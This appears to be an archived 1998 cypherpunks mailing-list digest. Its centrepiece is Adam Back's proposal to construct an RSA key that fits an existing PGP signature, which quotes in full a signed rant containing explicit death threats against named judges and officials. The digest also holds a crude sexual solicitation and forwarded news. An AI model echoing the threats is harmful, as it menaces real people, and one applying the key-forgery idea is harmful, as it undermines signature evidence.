Date: Sat, 19 Sep 1998 09:47:56 -0400
References: <v0401172fb22954e840e2@[139.167.130.247]>



Robert Hettinga wrote:

> ... Hailed as a "major step forward" in the fight against
> money laundering, the Justice Department proposal
> would broaden the government's ability to seize the
> profits of such illicit activity as drug dealing.
>

They forgot to mention the biggest money laundering operation, in Washington
D.C.,





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjm@spe.com
Date: Sat, 19 Sep 1998 05:16:37 +0800
To: cypherpunks@cyberpass.net
Subject: atheism (was: RE: Democracy... (fwd))
In-Reply-To: <199809171915.OAA15655@einstein.ssz.com>
Message-ID: <6485-Sat19Sep1998112432+0200-pjm@spe.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate writes:
[ . . . ]
 > A personal philosophy is a religion, different words but same idea. If your
 > thesis is that for something to be a religion it requires some sort of
 > social approval you miss the whole point. Even Jesus recognized that a
 > persons religion didn't rely on a 'church' and the implied infrastructure.
 > This is the reason he told his listeners to pray in a closet alone.

     Not all philosophies are religions.  Asserting so is an attempt
to make one or both of the terms meaningless.

 > > There is no reason to think that a god does exist, so why would one even
 > > need to think about or believe in the negative.
 > 
 > There is no reason to believe one doesn't either. If we take your claim at
[ . . . ]

     There are two forms of atheism (visit alt.atheism.moderated for
an unending discussion).  "Strong" atheists state that they "believe
that god does not exist."  "Weak" atheists state that they "do not
believe that god exists."  The first is a faith based positive
assertion, analogous to "god exists".  The second makes no assertion
and hence has no associated burden of proof.  Given the lack of
evidence for the existence of a god, it is the default, logical
position.

     Do you believe in leprechauns, because there is no proof that
they don't exist?  Do you believe in the Hindu pantheon?

[ . . . ]
 > Ah, another of your mistakes. Religion and by extension faith are not
 > constrained by reason or logic. It's this realisation that puts some
 > issues and aspect of human inquiry outside of the reach of science, logic,
 > etc.

     Without reason and logic, how do you propose to prove these
assertions?  Reason and logic don't "constrain", they provide a
framework for discovery.  This framework is unavailable to, and indeed
actively rejected by, believers in the supernatural.  Any meaningful
definition of the word "inquiry" presupposes the use of logic.

 > No, only some religions are irrational. The point you're missing is not
 > one of rationality or irrationality but rather transcendance.

     All faith-based assertions are by definition irrational.  Mystics
frequently speak of transcendence as if the word denotes a concept
with a particular meaning, but never provide a coherent definition.
Perhaps you'll surprise me?

Regards,

pjm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Thompson, Christopher W NWS" <Christopher.W.Thompson@NWS02.usace.army.mil>
Date: Sat, 19 Sep 1998 13:53:48 +0800
To: "'cypherpunks@toad.com>
Subject: A question from Seattle
Message-ID: <F41FB90AB607D2118E76006008C0BD5C4F4E21@NWSMAIL01>
MIME-Version: 1.0
Content-Type: text/plain



hey,  I'm a 28 year old living in Seattle and I've been having quite the
fantasy of watching and or participating in father/son activities...or big
brother and little brother interaction.  Do you have any suggestions
where/who I might contact in the Seattle metro area?

Thanks




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Sat, 19 Sep 1998 06:13:33 +0800
To: cypherpunks@cyberpass.net
Subject: CHALLENGE? Toto/signature attack w. unpublished public key
Message-ID: <199809191052.LAA19676@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




This post discusses the possibility of generating a RSA public key n,
and e given a signature s on a message m creating using an unknown
(unpublished) n and e.  A message and signature whose validity has
some bearing on a current IRS investigation is given as a target for
an attack if such an attack is feasible.

Toto published one signed message [1] but not a public key for the
signature.  It seems to me that there should be other public keys
which one could generate which could have signed the same message.

I would like comments on the feasibility of the signature attack
proposed below, and suggestions for more efficient methods.

(For those not following the Toto saga, he was the author of a series
of anti-government rants and future fiction stories on cypherpunks.
The posting of [1] to the list seems to have been deemed a handy
excuse for the IRS to arrange Carl Johnson's incarceration See:
http://jya.com/cejfiles.htm.  They claim that the presence of a public
key on Carl Johnson's hard disk proves that he authored the post in
question [1].)

What we have is:

Unknowns: e, n, d
Knowns: m, s

Where m = padding || md5( message )

A signature is computed as:

	s = m ^ d mod n

and verified by checking that:

	s ^ e mod n = m

( where RSA says: n = p.q, d.e = 1 mod (p-1).(q-1) )

We are trying to find an n and an e which satisfy s ^ e mod n = m,
with the additional constraints that log2( n ) = 1024 and n > s
(because we have the signature s, and it is 1024 bits in length).

For bonus points it would be nice for n mod 2^64 = 0xCE56A4072541C535,
which is the key-id in the signature.  (I say bonus points because the
key-id in the signature is not authenticated, or included in the
message digest, so could have been for example edited after the
signature was made, or filled with random numbers for whatever
reason).

Tinkering with PGP I can extract the values for the knowns:

s =   0x08F4D5CBC10063725B206F787EB7370BBD0C5B4854CE79A9007D1801AEAEE6E6
	D2C68D7EDF877FECE1FA539D08BEC54BD152BA05113951E8A84CDECAD2CB8E7A
	C28BE916570BA7BB9C00C64DF57113C4AE81613BD351541523CD3A028FBF220E
	F7469BD4175302DCB5B6E886974877F28A2D301433AFFFE26081008BFF687B37

m =   0x0001FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
	FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
	FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF003020
	300C06082A864886F70D0205050004105A82A30F832DC6839C20DD6DB2EF783B

(the 00 01 FF .. FF 00 are the PKCS#7 required padding, then the
3020300c06082a864886f70d020505000410 is the ASN padding indicating
various PKCS #7 cruft, and 5A82A30F832DC6839C20DD6DB2EF783B is the
digest of the message (which includes some of the info in the
signature block: timestamp, signature type, etc))

So next we would like to solve:

	s ^ e mod n = m

or in other words find e, k and n st:

	s ^ e - m = k * n

I have been trying to factor f3 = s ^ e - m for e = 3, and can get
factors:

f = 2 2 5 11 17 26496937

and

251048771208077840279253039518619486761149393656018551881762776705901\
323868599665917317036581098944533770815064901485649759588104677561495\
719846643046535204246014520276297740544890135011586884286882393788265\
716989378535974685125268132766806309723740928058713253950594405611241\
121342427851929130344133177905256374336176401503386547907484013668011\
870701681839150463738400849274433891413410494500220449307074230633487\
686485522732190007426023068542565670710414256907678005650439818373128\
045462081252984434043133357326332595300178784873354995536385391488171\
082297914170316457453668703759313538562865586078736676571820284813613\
435988240345557012477625002576044754861439307189875911957770722297269\
127365840009630893296289725097984631185778357339553526670628683341222\
179800672224971064029655723085468566526546006022122686584662976524189\
679277675211381453870834486124773894995875790430641434242560016378644\
4039359130261

(I call the f resulting from choosing e = 3, f3, other e values can be
denoted f5, f7, etc).

It seems to me that if we can get get a factor out (or construct a
composite from factors) which is greater than s, and is 1024 bits
long, then this "key" could have signed the message in question.

If the number has 2 or more factors, which we know because we
constructed it by multiplying them, then we could even "sign" another
message with this key, by generating a d based on the p, q (and
possibly other multiples) and have both messages appear to be signed
by the same key.

If we can get some larger factors, we stand a chance because we have
the flexibility of being able to adjust a potentional n's size by
multiplying by combinations of factors found so far 5 11 17 26496937.
This means we can adjust n's size by adding bits by multiplying by
combinations as follows

combination		bits added

5			2 - 3
11			3 - 4
17			4
5 11			5 - 6
5 17			6 - 7
11 17			7 - 8
26496937		24 - 25

So the challenge is to find other factors of:

f =	251048771208077840279253039518619486761149393656018551881762776705901\
	323868599665917317036581098944533770815064901485649759588104677561495\
	719846643046535204246014520276297740544890135011586884286882393788265\
	716989378535974685125268132766806309723740928058713253950594405611241\
	121342427851929130344133177905256374336176401503386547907484013668011\
	870701681839150463738400849274433891413410494500220449307074230633487\
	686485522732190007426023068542565670710414256907678005650439818373128\
	045462081252984434043133357326332595300178784873354995536385391488171\
	082297914170316457453668703759313538562865586078736676571820284813613\
	435988240345557012477625002576044754861439307189875911957770722297269\
	127365840009630893296289725097984631185778357339553526670628683341222\
	179800672224971064029655723085468566526546006022122686584662976524189\
	679277675211381453870834486124773894995875790430641434242560016378644\
	4039359130261

One could also try other values for e, although they result in larger
f.  

What is the best factoring code available to have a go at factoring
the above?  (I have been usign the demo pollard-rho factoring code
which comes with ssh-1.2.26 in the gmp-2.0.2-ssh-2/demos directory).
Anyone interested to give this a go, who has say got a few (hundred?)
workstations already setup for another factoring challenge which they
could divert to attack the above f3 (or f5, f7, etc).

Course, if Toto is still at large, and Carl Johnson is not the only
one with the key (and some messages on cypherpunks recently lend
credence to this), he might trash this challenge by posting another
signed message, or weaken it's value by posting a public key which
proved could be shown to have been derived by this method.
(Interestingly, I think merely posting a public key claiming to be the
`real key' which we couldn't factor nor show to be a factor of f
wouldn't prove that that key was any more legitimate than a key
generated by a success on this challenge, all it would tend to show
would be that the person who posted it had more compute power
available than us!)

Adam

[1]
-----BEGIN PGP SIGNED MESSAGE-----



"Contrary to one famous philosopher,
you're saying the medium is not the
message," Judge Thomas Nelson said,
alluding to the media theorist Marshall
McLuhan. 
http://www.nytimes.com/library/cyber/week/120997encrypt-bernstein.html

  Bullshit!
  The bits and bytes of email encryption are a clear message
that I wish to exercise my right to speak freely, without those
who wish to do me harm invading my privacy.
  The death of strong encryption on the InterNet will be the
global death of free speech on the InterNet. Accordingly, I 
feel it is necessary to make a stand and declare that I stand
ready and willing to fight to the death against anyone who
takes it upon themselves to try to imprison me behind an
ElectroMagnetic Curtain.

  This includes the Ninth Distric Court judges, if they come to
the conclusion that the government that they represent needs to
electronically imprison their citizens 'for their own safety.'


The problem: Criminals with a simple
encryption program can scramble their data
beyond even the government's ability to read it. 
http://www.zdnet.com/zdnn/content/zdnn/1208/261695.html

  Fuck the lame LEA pricks who whine about not being able to
stop someone bringing in a planeload of drugs without being
able to invade the privacy of every person on the face of
the earth.
  Am I supposed to believe that I have knowledge of when and
where major drug shipments are taking place, simply by virtue
of hanging out as a musician, yet the LEA's are incapable of
finding out the same information by being competent in their
profession? Barf City...
 [I will shortly provide information for any LEA which wishes
  to prosecute me for my coming 'physical' death threat, on
  how to hunt me down like the filthy dog that I am.]

"Why are you saying that the fact that [encryption]
is functional takes it out of the First Amendment
context?" Myron Bright, one of the judges, asked
the Justice Department attorney, who was still in
mid-sentence. He answered that the regulations
were not aimed at suppressing speech, but only at
the physical capacity of encryption to thwart
government intelligence gathering. 

  The Spanish language has the same "physical capacity." So 
does (:>), (;[), and {;-|). Likewise, BTW, FWIW, FYI, and
my own personal favorite, YMMV (You Make Me Vomit? --or--
Your Mileage May Vary?). <-- Ambidextrous encryption.
  An-cay e-way pect-exay ig-pay atin-lay usts-bay of 
ildren-chay?
  Whispering also has the "physical capacity" to "thwart 
government intelligence gathering."

  When does the bullshit stop? When do we stop making the
use of the Spanish language over the InterNet illegal?
When do we stop making whispering, pig-latin, anagrams
and acronyms illegal?
  When do we stop saying that our government is such a
piece of crap that it is a danger to let its citizens
communicate freely, in private, and share their private
thoughts with one another?


At one point Fletcher called the government's case 
"puzzling."
http://www.news.com/News/Item/0,4,17114,00.html

  Only because her mom taught her that it was unladylike to
say "Bullshit!"


In arguments Monday, a Justice Department
lawyer, Scott McIntosh, said the government's
intent was to preserve the ability of intelligence
agencies to eavesdrop on foreign governments
and citizens. 
http://www.nytimes.com/library/cyber/week/120997encrypt-bernstein.html

  Let's see if I have this right...
  The U.S. government needs to destroy the right to free speech 
and right to privacy of its own citizens in order to infringe
upon the human rights of the governments and citizens of other
countries? Countries which already have strong encryption?
Countries like Red China, which is currently engaged in 
encryption research with an American company who got permission
to export much more diverse encryption material (after making
a huge campaign donation to the Whitehouse) than Professor
Bernstein will ever likely share with others?
  Apologies to Judge Fletcher, but that's not "puzzling." That's
the same-old-same-old Bullshit!


OFFICIAL 'PHYSICAL' DEATH THREAT!!!
  The pen is mightier than the sword. Thus, I prefer to wage my
'war to the death' against those who would stomp on my basic
human rights *"in the interests of National Security"* with my
electronic pen, on the InterNet, using encryption when I have
reason to fear persecution by Facist, Nazi motherfuckers.
[* ~~ TruthMonger Vernacular Translation ~~ "so that the 
 government can maintain its authority over the citizens
 by use of force and violation of human rights, rather than
 going to all of the trouble of acting in a manner that will
 garner the citizens' respect."]

  I will continue to express my thoughts through the words
I send electronically over the InterNet, both publically
and privately. I will fight to the bandwidth death against
anyone who wants to deny me my right to express my opinions
and access the opinions of those who also wish to express
their own opinions and share their true thoughts with their
fellow humans.
  If the ElectronicMagnetic Curtain slams down around me, 
then I will have no choice but to continue my current fight
in MeatSpace.
  And I am not alone...

  I will share the same 'DEATH THREAT!!!' with Judges Fletcher,
Nelson and Bright that I have shared with the President and
a host of Congressional and Senatorial representatives:
  "You can fuck some of the people all of the time, and all of
the people some of the time, but you are going to end up in a
body bag or a pine box before you manage to fuck all of the
people all of the time."

  Am *I* going to whack you out? Maybe...
  I would prefer just dumping some tea in Boston Harbor, if that
will get my message across in MeatSpace, but if it won't, then
I guess I will have to take stronger action.
  There are undoubtedly a plethora of LEA's ready and willing to
prosecute and imprison me for agreeing with Patrick Henry, who
said, "Give me liberty, or give me death." The irony, of course,
is that I do not pose a great danger to anyone but myself as
long as I continue to have my human rights and my liberty
unthreatened.

  The chances of me actually getting off of my fat butt and
going out into the real world to whack out the enemies of
freedom are probably pretty small (unless I run out of 
cigarettes and beer, and wouldn't have to make an extra 
trip).
  I fully understand that this does not lessen the potential
of any LEA who gets a wild hair up their butt to throw a
mountain of taxpayer resources into prosecuting me and 
imprisoning me for their own professional/political gain.
  However, if you are performing actions so outrageously against
basic human rights and freedoms as to get me off of my lazy ass,
then I am the least of your problems, because there undoubtedly
are millions of people more functional than myself (who get out
of the house and go further than the liquor store) who are less
willing than myself to put up with increasingly heavy chains
placed around their hands and feet 'in the interests of national
security.'

  Feel free to have the Federales break down my door and
imprison me for pointing out the obvious. After all, I fit
the profile of a domestic terrorist--I quote the Constitution 
and the Bill of Rights, and I speak out against increasingly
big government.
  But remember...it's the quiet ones you've got to watch...
If you force everyone to 'be quiet', then you've got a world
of trouble on your hands.

Sincerly,
John Gilmore <gnu@toad.com>
~~~~~~~~~~~~~~~~~~~~~~~~~~~
p.s.
NOTICE TO LEA AGENTS IN NEED OF A CAREER BOOST!
  Yes, I'm just a troublemaking asshole, trying to get John
<spit> Gilmore <fart> in trouble.
  However, if you want to go to the trouble of tracking me 
down, I will give you some hints, since it seems likely that
anyone who has trouble finding a ton of cocaine at an 
airport might not be competent in CyberSpace, either.
  You might want to check with the Webmasters at the sites
quoted above to see who has accessed their web sites this
morning. The anonymous remailer I will be using is an open
secret to CypherPunks around the world as a really bad 
attempt at disguising my true MeatSpace identity. This alone
ought to be enough for some aggressive young LEA and/or
federal prosecutor to earn themself some brownie-points,
since I am a sorry enough son-of-a-bitch that they would not
have much trouble convicting me in front of a jury of 'their'
peers, assuming that they can make certain that I am not 
tried by a jury of my own peers.

Bonus Points:
  I can also be tied into Jim Bell's Worldwide Conspiracy to 
assassinate government authorities, through my implementation
of an Assassination Bot.
 (I am willing to 'rat out' Jim for two bottles of Scotch. If
 he is willing to rat _me_ out for less, then I guess it's
 just my hard luck, eh? <--that's another hint!)

p.p.s.
  You can also charge me with use of 'conventional' encryption
in the commission of a crime.
  Must be your lucky fucking day, eh?

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBNI24Hs5WpAclQcU1AQFaggP8CPTVy8EAY3JbIG94frc3C70MW0hUznmp
fRgBrq7m5tLGjX7fh3/s4fpTnQi+xUvRUroFETlR6KhM3srSy456wovpFlcLp7uc
xk31cRPEroFhO9NRVBUjzToCj78iDvdGm9QXUwLctbbohpdId/KKLTAUM6//4mCB
i/9oezfegWc=
=4/6E
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 19 Sep 1998 14:27:23 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Pentagon may modify websites
Message-ID: <199809191929.MAA03045@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: Richard Sampson <rjsa@sprintmail.com>
Subject: IP: Pentagon may modify websites
Date: Wed, 16 Sep 1998 23:08:02 -0400
To: "ignition-point@majordomo.pobox.com" <ignition-point@majordomo.pobox.com>

Pentagon may modify websites
WASHINGTON, Sept. 16 (UPI) _ The Pentagon is reviewing its Internet
policies to determine if there is too much information on its public
access websites.

The Defense Department and the four armed services operate several
Internet websites. Internet users including newspaper reporters, high
school students working on term papers and military history buffs visit
them frequently to download photos, news releases, and other
information.

But Defense Department spokesman Kenneth Bacon said today that top
Pentagon officials have become concerned that the information contained
on those websites could be used by terrorists and others for illegal
purposes.

Bacon did not say what information officials are specifically concerned
about or what caused them to begin reviewing the content of the
department's websites. He did say, however, that no information
contained on websites to date has been put to use by terrorists.

''This is more in the area of heading off a problem rather than
reacting to one,'' he said.

No date has been set for the website review to be completed. _-

Copyright 1998 by United Press International.

All rights reserved. _-
By MIKE BILLINTON


News provided by COMTEX.
[!BUSINESS] [!GOVERNMENT] [!WALL+STREET] [!WORLD+AFFAIRS] [HIGH+SCHOOL]
[INTERNET] [MILITARY] [NEWS] [NEWSGRID] [UPI] [WASHINGTON]


--
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a
prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------





**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 19 Sep 1998 14:27:44 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Tougher laws are sought to seize cash
Message-ID: <199809191929.MAA03056@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Tougher laws are sought to seize cash
Date: Thu, 17 Sep 1998 08:45:24 -0500
To: believer@telepath.com

Source:  Bergen (New Jersey) Record
http://www.bergen.com/news/njmone199809154.htm

Tougher laws are sought to seize cash 

Tuesday, September 15, 1998

By ADAM PIORE
Washington Correspondent

WASHINGTON -- Federal law enforcement
officials on Monday unveiled a plan they say will
help stop the flow of billions of dollars in drug money
across the nation's borders every year.

Hailed as a "major step forward" in the fight against
money laundering, the Justice Department proposal
would broaden the government's ability to seize the
profits of such illicit activity as drug dealing.

It now is illegal to try to leave the country with more
than $10,000 in currency without reporting it to U.S.
Customs officials. Violations are punishable by up to
five years in prison and seizure of the money. But in
June, the U.S. Supreme Court dealt a serious blow
to efforts to seize the unreported cash, ruling in a
precedent-setting case that such seizures often
violate constitutional protections against "excessive
fines."

The new proposal is aimed at correcting the
loopholes opened up in the June court decision. It
would for the first time allow law enforcement
officials to arrest people concealing currency before
they even reach the border.

It would allow the seizure of $10,000 or more at the
nation's ports and highways -- hundreds of miles
from any crossing -- if agents can prove that there is
intent to smuggle the concealed money out of the
country. 

But it goes beyond that, giving agencies tools they
have not had in the fight to stop the flow of illegal
drug profits out of the country, said Stefan D.
Cassella, the assistant chief of the money-laundering
and forfeiture section of the U.S. Department of
Justice.

"This is a major step forward to address a new
problem," Cassella said. "We know that the covert
movement of currency across borders is indicative
and inherently related to criminal activity."

Civil libertarians condemned the proposed law,
which the Justice Department sent to Congress on
Monday, because they said it would expand the
ability of law enforcement agencies to seize currency
and keep it.

A series published in The Record this year revealed
how New Jersey, with its sprawling seaport,
international airport, lax laws, and proximity to New
York and Philadelphia, had emerged as a hub for
money laundering and currency smuggling over the
past 15 years. Cassella said the decision to push for
the more stringent laws was inspired in part by The
Record's stories.

In its letter to Congress, the Justice Department
cited the series as evidence of the growing problem
in currency smuggling.

The proposed law would give officials the ability to
go after a wider range of smuggling that has been
difficult for them to stop. Every year, for instance,
billions of dollars in illegal drug profits is smuggled
across the border unchecked, crammed into washing
machines, refrigerators, or hidden under false
bottoms in suitcases and trucks bound for the
border.

Over the past nine months, customs inspectors have
seized more than $11 million at the border that
stretches from Texas to California.

And at Port Newark, Customs agents seized $5.5
million in fiscal year 1997, the fourth-highest amount
seized among all U.S. ports.

Cassella said the Justice Department hopes its
proposal will be offered as an amendment to
money-laundering legislation being considered by the
House. But several congressional staffers were
skeptical that the proposal would be considered by
this Congress, because of the controversy over civil
forfeiture. Congress is slated to adjourn is less than a
month.

In addition, the new regulations, if passed, would
likely face immediate legal challenges.

In June, the U.S. Supreme Court overturned the
seizure of $357,144 from a Hollywood, Calif., gas
station owner. Federal officials seized Hosep Krikor
Bajakajian's money after the Syrian immigrant tried
to carry it out of the country without reporting it --
even though he was told of the federal reporting
requirements by customs agents. A divided court
ruled the fine was excessive because the only impact
of Bajakajian's crime was to deprive the government
of "information on a piece of paper."

By creating a category of crime called "bulk cash
smuggling," law enforcement officials hope to
convince the Supreme Court that efforts to evade
detection could have a direct impact on the "security
and integrity" of the nation's borders, Cassella said.
The crime would be punishable by up to five years in
prison and forfeiture of the money involved.

"Bulk cash smuggling is an inherently more serious
offense than simply failing to file a customs report,"
Justice Department officials wrote in an explanation
of the bill provided to Congress. "Because the
constitutionality of forfeiture is dependent on the
'gravity of the offense' . . . it is anticipated that the full
forfeiture of smuggled money will withstand
constitutional scrutiny in most cases."

Local prosecutors hailed the proposed change.

"Clearly, it's an effort to convince the Supreme
Court that Congress did view this as more than a
mere reporting violation and that forfeiture of the
smuggled money is appropriate," said Marion
Percell, an assistant U.S. Attorney in Newark who
specializes in money-laundering cases.

Critics attacked the bill, calling it just another effort
by overzealous law enforcement officials to expand
seizure powers that deprive citizens of due process.

Roger Pilon, director of the Center for Constitutional
Studies at the Cato Institute, warned that civil asset
forfeiture is subject to abuse by law enforcement
authorities.

"This is unbelievable," he said. "Everything that
Justice does in this area is characterized as a 'major
step.' But that's no justification. Since when is it a
crime to take money out of the country? After all,
whose money is it?"

Rachel King, legislative counsel of the American
Civil Liberties Union, agreed. "The problem is they
have too much power to seize property," she said.
"The laws need to go the other way. What they can
do already is scary."

Staff Writers Julie Fields and Thomas Zambito
contributed to this article.

Copyright (c) 1998 Bergen Record Corp.
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 19 Sep 1998 14:27:26 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Tracking: DNA database in Okla.
Message-ID: <199809191929.MAA03067@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Tracking: DNA database in Okla.
Date: Thu, 17 Sep 1998 08:54:13 -0500
To: believer@telepath.com

Source:  Tulsa World
http://www.tulsaworld.com/News.htm

DNA database helps make case 
 By World's own Service 
 9/16/98

 OKLAHOMA CITY -- A 1994 law
 creating a DNA database for Oklahoma law
 enforcement contributed to Monday's
 conviction in an Oklahoma City mass murder
 case, an author of the law said Tuesday.

 Danny Keith Hooks was found guilty
 Monday of the May 16, 1992, murders of
 five women in Oklahoma City. Jurors must
 now decide whether to sentence him to
 death.

 Hooks was first identified through genetic
 evidence collected at the crime scene. The
 arrest and conviction marked one of the first
 major cases involving the Oklahoma State
 Bureau of Investigation's DNA database and
 lab since it became operational in 1994, said
 Rep. James Dunegan, D-Calera.

 Under the law, blood samples are collected
 from certain convicts, and OSBI technicians
 analyze and type the genetic markers. That
 information is then stored in a database. The
 law also enlarged the bureau's DNA
 laboratory, Dunegan said.

 The Oklahoma City mass killing had
 remained unsolved for five years. Oklahoma
 City police records showed that until Hooks
 was arrested last year, more than 700
 reports had been written on the case, 8,000
 people had been fingerprinted and more than
 400 blood samples had been analyzed in the
 case.

 The Oklahoma State Bureau of Investigations
 ran unidentified DNA from blood at the
 crime scene through several states' databases
 of criminals' genetic profiles, said Kym Koch,
 a spokeswoman for the OSBI. 

 While at an out-of-state national conference
 of DNA criminalists in 1996, the head of the
 OSBI's DNA lab asked experts from
 California to analyze the unknown DNA,
 Koch said. It matched Hooks' genetic
 profile, proving he had been at the crime
 scene. Prosecutors said Hooks must have
 been cut while he was killing his victims.

 Hooks had served time in a California prison
 on a rape conviction. Law enforcers were
 able to trace the DNA samples found at the
 murder scene to Hooks because he had to
 submit a DNA sample to California
 corrections officials before his release there.

 Hooks was convicted of killing the women
 during a sexual attack. He was arrested last
 year in California.

 Koch said roughly half of the states have their
 own DNA databases.

            Copyright 1996, World Publishing Co. All rights reserved.
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 19 Sep 1998 14:27:29 +0800
To: cypherpunks@cyberpass.net
Subject: IP: School bans `no rules' T-shirt
Message-ID: <199809191929.MAA03078@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: School bans `no rules' T-shirt
Date: Thu, 17 Sep 1998 09:25:30 -0500
To: believer@telepath.com

Source:  St. Paul, Minnesota Pioneer Planet News
http://www.pioneerplanet.com/news/wis_docs/010832.htm

Published: Thursday, September 17, 1998 

School bans `no rules' T-shirt

ASSOCIATED PRESS 

 WAUKESHA, WIS.

A fifth grader was ordered to turn his T-shirt inside-out because it
carried the message ``No Rules,'' which the principal said promoted
disruptive behavior.

But the youth's mother said Saratoga Elementary School principal Dale
Heinen overstepped his bounds and that there was no harm in wearing such
shirts, which depict cartoon characters and carry the slogan, ``Outta my
way. No Rules.''

Heinen made Cody Wilhelm wear the shirt inside-out so no one could read its
message.

``School guidelines talk about things that are disruptive and can lead to
disruption,'' Heinen said. ``If they are portraying that in what they wear
. . . we don't want kids reflecting that attitude or promoting that type of
attitude.''

Mary Wilhelm said her son's T-shirt was not disruptive and that parents
should have the right to dress their children with any clothes they want to
as long as they do not promote sex, drugs, alcohol, tobacco or illegal
activities. 

She said her son went to school last year wearing one of the ``No Rules''
T-shirts and also wore a T-shirt depicting ``Joe Camel,'' a cartoon
character formerly used to promote Camel cigarettes. School officials did
not object, she said.

``He should have never worn that Joe Camel shirt, I agree, but that dealt
with smoking,'' Wilhelm said.

``This is different. I don't want to have the principal tell me what I can
and can't do with my kid.''

(c)1998 PioneerPlanet / St. Paul (Minnesota) Pioneer Press - All Rights
Reserved 
copyright information
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sat, 19 Sep 1998 14:28:03 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Huge Philly Terrorist Drill Yesterday
Message-ID: <199809191929.MAA03089@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Huge Philly Terrorist Drill Yesterday
Date: Thu, 17 Sep 1998 09:32:52 -0500
To: believer@telepath.com

Source:  Chicago Tribune
http://chicagotribune.com/news/nationworld/article/0,1051,SAV-9809170173,00.
html

HUGE SIMULATED TERRORIST ATTACK AIMED AT PUTTING CITY ON GUARD

 From Tribune News Services
 September 17, 1998 

 PHILADELPHIA, PENNSYLVANIA --
 The Army on Wednesday gave
 Philadelphia's law-enforcement and rescue
 crews a daylong taste of what it might be
 like if terrorists unleashed deadly Sarin
 nerve gas during a civic luncheon for 1,500
 people.

 Sirens shattered the calm of Philadelphia's
 Fairmount Park as hundreds of police,
 firefighters and federal troops rushed to the
 aid of city workers acting out their parts as
 victims of the attack.

 "You can't predict an Oklahoma City. You
 can't predict what happened in Tokyo. And
 you can't predict what happened in New
 York," Army Col. Richard Breen shouted
 over the roar of fire engines. "It's better to
 be proactive and train people so that a city
 like Philadelphia can take . . . care of its
 citizens if, God forbid, something like this
 really were to occur."

 The drill was part of a Defense Department
 program to train cities to cope with
 chemical, biological and nuclear terrorism.
 The exercise, the biggest yet to be staged
 by the Army Chemical and Biological
 Defense Command, involved beat officers,
 bomb-disposal experts, hazardous-material
 teams, firefighters, ambulance crews,
 National Guardsmen, federal emergency
 managers, FBI agents, the Coast Guard and
 the American Red Cross.

 Organizers refused to say how many people
 took part. "We would not want to
 broadcast . . . just what our personnel and
 equipment strengths would be to meet this
 type of emergency," a city official said.

 Later this month in a similar exercise, the
 Army plans to simulate another Sarin attack
 on a music concert at RFK Stadium in
 Washington.
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




